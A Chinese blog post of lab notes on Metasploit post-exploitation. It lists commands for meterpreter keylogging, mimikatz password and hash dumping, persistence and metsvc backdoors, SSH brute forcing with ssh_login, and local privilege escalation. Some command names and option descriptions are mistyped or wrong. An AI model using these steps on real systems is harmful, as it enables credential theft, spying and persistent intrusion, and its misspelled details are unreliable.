msf进阶

msf进阶

在得到目标机shell后的进阶使用

键盘监听

Keyscan_strat:开启键盘记录功能

Keyscan_dump:显示捕捉到的键盘记录信息

Keyscan_stop:停止键盘记录

获取密码

在mimikatz模块,能获取目标主机的哈希和明文密码,常用命令:

以下均在msfconsole中运行

Load mimikatz:加载mimikatz

Msv:获取hash

Kerberos:获取明文密码

Widigest:获取系统账户信息

msf植入后门

由于meterpreter是仅运行于内存中的shellcode,一旦目标主机重启或更换ip,将失去目标主机的控制权,如果管理人员打上漏洞补丁,二次入侵会变得更加困难

所以metesploit提供了persistence和mstsvc等后渗透模块,通过在目标主机上安装自启动和永久服务的方式长久的控制目标主机

persistence后渗透模块:

通过启动项启动,定期回连、自动运行

Run persistence -S -U -X -i 间隔时间 -p 监听端口号 -r 目标ip地址

image.png

mstsvc后渗透攻击模块:

将msf以系统服务的形式安装到目标主机的服务上

Run mstsvc

只要运行metsvc,就在目标主机的31337端口开启后门监听

实验:msf ssh爆破

拿到环境namp -sV ip扫目标主机

打开msf,使用auxiliary/scanner/ssh/ssh_login辅助模块(是个扫描模块),并配置参数

Set rhost ip set user_file 字典 set pass_file 字典

爆破成功并返回shell

Uname -a看到权限较低,进行提权

搜索系统对应的exp或者expoit/linux/local/文件内找对应文件进行提权

配置expoit,攻击

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值